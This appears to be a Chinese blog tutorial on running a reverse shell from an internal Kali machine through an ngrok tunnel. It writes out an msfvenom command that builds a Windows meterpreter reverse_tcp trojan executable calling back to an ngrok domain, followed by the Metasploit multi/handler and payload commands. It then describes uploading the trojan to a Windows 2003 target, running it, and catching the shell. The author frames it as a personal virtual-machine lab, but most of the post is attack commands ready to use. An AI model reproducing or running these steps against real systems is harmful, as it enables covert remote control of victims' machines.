内网kali 通过ngrok穿透反弹shell

 

1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc)

   这里我kali的内网ip地址是10.10.10.131

内网kali 通过ngrok穿透反弹shell_第1张图片

 

 

2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html)

 

解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件

 

3、启动sunny

  ./sunny  clientid 隧道id

内网kali 通过ngrok穿透反弹shell_第2张图片

如上图说明启动成功

 

4、目标机 ip地址192.168.43.170(win2003)  kali 10.10.10.131(这里是我通过虚拟机配置的内外网环境)

 

即目标机无法ping通kali   kali可以ping通目标机  即kali处于内网 验证如下图

内网kali 通过ngrok穿透反弹shell_第3张图片

 

内网kali 通过ngrok穿透反弹shell_第4张图片

 

 

5、kali端配置木马

   Msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10326 -f exe -o /root/Desktop/puty.exe   (生成木马)

LHOST 为赠送的域名

LPORT 为远程端口号

6、启动msf配置Exploit模块

   Use exploit/multi/handler

7、选择攻击载荷

   Set payload windows/meterpreter/reverse_tcp

 

 内网kali 通过ngrok穿透反弹shell_第5张图片

执行run 或许exploit

注意这里的ip地址和端口号,不要和前面的搞混了

 

上传之前生成的木马并且执行

内网kali 通过ngrok穿透反弹shell_第6张图片

 

已经成功将shell反弹到我们的内网kali

教程就到这里 有不懂得可以加我QQ864691690

你可能感兴趣的:(kali,linux)